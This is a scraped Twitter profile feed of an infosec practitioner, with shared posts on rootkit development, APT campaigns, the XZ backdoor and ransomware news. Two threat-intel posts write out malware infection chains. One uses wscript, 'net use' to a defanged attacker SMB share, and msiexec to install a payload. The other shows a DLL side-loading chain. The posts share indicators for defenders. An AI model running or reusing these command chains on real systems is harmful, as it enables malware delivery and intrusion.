TomU | I'm still here... til the end 🕊️🇨🇭(@c_APT_ure) 's Twitter Profileg
TomU | I'm still here... til the end 🕊️🇨🇭

@c_APT_ure

#InfoSec professional, husband & father of two (in random order). #BlueTeam #DFIR #APT #CTI #RedTeaming #BSidesZH (RT/Likes ≠ endorsement) 👀➡️#MalwareChallenge

ID:205435856

linkhttp://c-apt-ure.blogspot.com/ calendar_today20-10-2010 21:56:04

14,3K Tweets

8,0K Followers

5,3K Following

0xor0ne(@0xor0ne) 's Twitter Profile Photo

Red teaming and adversary emulation: series on Windows rootkits development
Credits Ido Veltzman

Part 1: idov31.github.io/2022/07/14/lor…
Part 2: idov31.github.io/2022/08/04/lor…
Part 3: idov31.github.io/2022/10/30/lor…
Part 4: idov31.github.io/2023/02/24/lor…
PArt 5: idov31.github.io/2023/07/19/lor…

Red teaming and adversary emulation: series on Windows rootkits development Credits @Idov31 Part 1: idov31.github.io/2022/07/14/lor… Part 2: idov31.github.io/2022/08/04/lor… Part 3: idov31.github.io/2022/10/30/lor… Part 4: idov31.github.io/2023/02/24/lor… PArt 5: idov31.github.io/2023/07/19/lor… #windows #infosec
account_circle
Ax Sharma(@Ax_Sharma) 's Twitter Profile Photo

A GitHub flaw lets attackers upload executables that appear to be hosted on a company's official repo, such as Microsoft's—without the repo owner knowing anything about it.

The following URLs, for example, make it seem like these ZIPs are present on Microsoft's source code repo:

A GitHub flaw lets attackers upload executables that appear to be hosted on a company's official repo, such as Microsoft's—without the repo owner knowing anything about it. The following URLs, for example, make it seem like these ZIPs are present on Microsoft's source code repo:
account_circle
Dennis(@DennisF) 's Twitter Profile Photo

'The most obvious sort of pivotal moment to me is their movement into wartime operations.' Gabby Roncone 🇺🇦 🇵🇸

A Decade of Sandworm: Digging into APT44’s Past and Future decipher.sc/a-decade-of-sa… sec

account_circle
mRr3b00t(@UK_Daniel_Card) 's Twitter Profile Photo

Want to know how to actually defend your business? Here's this one simple trick....

It's called PLANNING and following a sensible process! I know, THIS SECRET can be yours:

head to:

pwndefend.com for more SECRET cyber TIPS!

Want to know how to actually defend your business? Here's this one simple trick.... It's called PLANNING and following a sensible process! I know, THIS SECRET can be yours: head to: pwndefend.com for more SECRET cyber TIPS!
account_circle
Jason Haddix(@Jhaddix) 's Twitter Profile Photo

A 13 year old coded a botnet control framework that utilizes pastebin and github for control of hosts in red teaming…

This makes the hacker in me so hopeful.

Check out pastebomb when it’s dropped!

A 13 year old coded a botnet control framework that utilizes pastebin and github for control of hosts in red teaming… This makes the hacker in me so hopeful. Check out pastebomb when it’s dropped!
account_circle
Thomas Roccia 🤘(@fr0gger_) 's Twitter Profile Photo

I just came across a tool called AttackGen. It's a simple tool that generates incident scenarios based on a Threat Actor and suggests simulations and possible detections at a high level.

👉 code: github.com/mrwadams/attac…
👉 app: attackgen.streamlit.app

I just came across a tool called AttackGen. It's a simple tool that generates incident scenarios based on a Threat Actor and suggests simulations and possible detections at a high level. #llm #python #threatintel 👉 code: github.com/mrwadams/attac… 👉 app: attackgen.streamlit.app
account_circle
Cryptolaemus(@Cryptolaemus1) 's Twitter Profile Photo

- - url > .js > smb > .msi

wscript.exe Doc_m42_81h118103-88o62135w8623-1999q9.js

net use A: \\krd6.]com@80\share\ /persistent:no

msiexec.exe /I avp.msi

msiexec.exe /V

(1/3) 👇

IOC's
github.com/pr0xylife/SSLo…

#SSLoad - #TA578 - url > .js > smb > .msi wscript.exe Doc_m42_81h118103-88o62135w8623-1999q9.js net use A: \\krd6.]com@80\share\ /persistent:no msiexec.exe /I avp.msi msiexec.exe /V (1/3) 👇 IOC's github.com/pr0xylife/SSLo…
account_circle
Virus Bulletin(@virusbtn) 's Twitter Profile Photo

Splunk researchers look into the tactics, techniques and procedures employed by APT29 in a recent campaign. The attack chain begins with a spear-phishing email leading to the delivery of the WINELOADER backdoor. splunk.com/en_us/blog/sec…

Splunk researchers look into the tactics, techniques and procedures employed by APT29 in a recent campaign. The attack chain begins with a spear-phishing email leading to the delivery of the WINELOADER backdoor. splunk.com/en_us/blog/sec…
account_circle
Cryptolaemus(@Cryptolaemus1) 's Twitter Profile Photo

- - .pdf > url > .zip > .js > .js > .dll

wscript Invoice_818493.js

wscript out.js

C:\Users\Admin\AppData\Local\Temp\npp.8.6.4.portable.x64\notepad.exe (sideload)👇

\npp.8.6.3.portable.x64\plugins\mimeTools.dll

(1/3) 👇

IOC's
github.com/pr0xylife/Wiki…

#WikiLoader - #TA544 - .pdf > url > .zip > .js > .js > .dll wscript Invoice_818493.js wscript out.js C:\Users\Admin\AppData\Local\Temp\npp.8.6.4.portable.x64\notepad.exe (sideload)👇 \npp.8.6.3.portable.x64\plugins\mimeTools.dll (1/3) 👇 IOC's github.com/pr0xylife/Wiki…
account_circle
Nicolas Krassas(@Dinosn) 's Twitter Profile Photo

Critical Atlassian Flaw Exploited to Deploy Linux Variant of Cerber Ransomware thehackernews.com/2024/04/critic…

account_circle
Juliano Rizzo(@julianor) 's Twitter Profile Photo

🔎Researchers are working hard but still need to conclude the XZ backdoor analysis and determine whether it has alternative communication channels or triggers.
🎁The xz-min project by Felipe Contreras is a way to easily reproduce the XZ backdoor to study it:
github.com/felipec/xz-min

🔎Researchers are working hard but still need to conclude the XZ backdoor analysis and determine whether it has alternative communication channels or triggers. 🎁The xz-min project by @felipec is a way to easily reproduce the XZ backdoor to study it: github.com/felipec/xz-min
account_circle
Eugene Kaspersky(@e_kaspersky) 's Twitter Profile Photo

XZ backdoor story – Initial analysis.

Unlike other supply chain attacks we have seen in Node.js, PyPI, FDroid, and the Linux Kernel that mostly consisted of atomic malicious patches, fake packages and typosquatted package names, this incident was a multi-stage operation that

XZ backdoor story – Initial analysis. Unlike other supply chain attacks we have seen in Node.js, PyPI, FDroid, and the Linux Kernel that mostly consisted of atomic malicious patches, fake packages and typosquatted package names, this incident was a multi-stage operation that
account_circle
Zach(@svch0st) 's Twitter Profile Photo

🎁 Today I'm giving away 3 of our DFIR Labs! 🎁

To enter:
✅Follow me
✅RT & Like this post
✅Reply with which case you'd like to take

The winners will be selected in 24 hours.

account_circle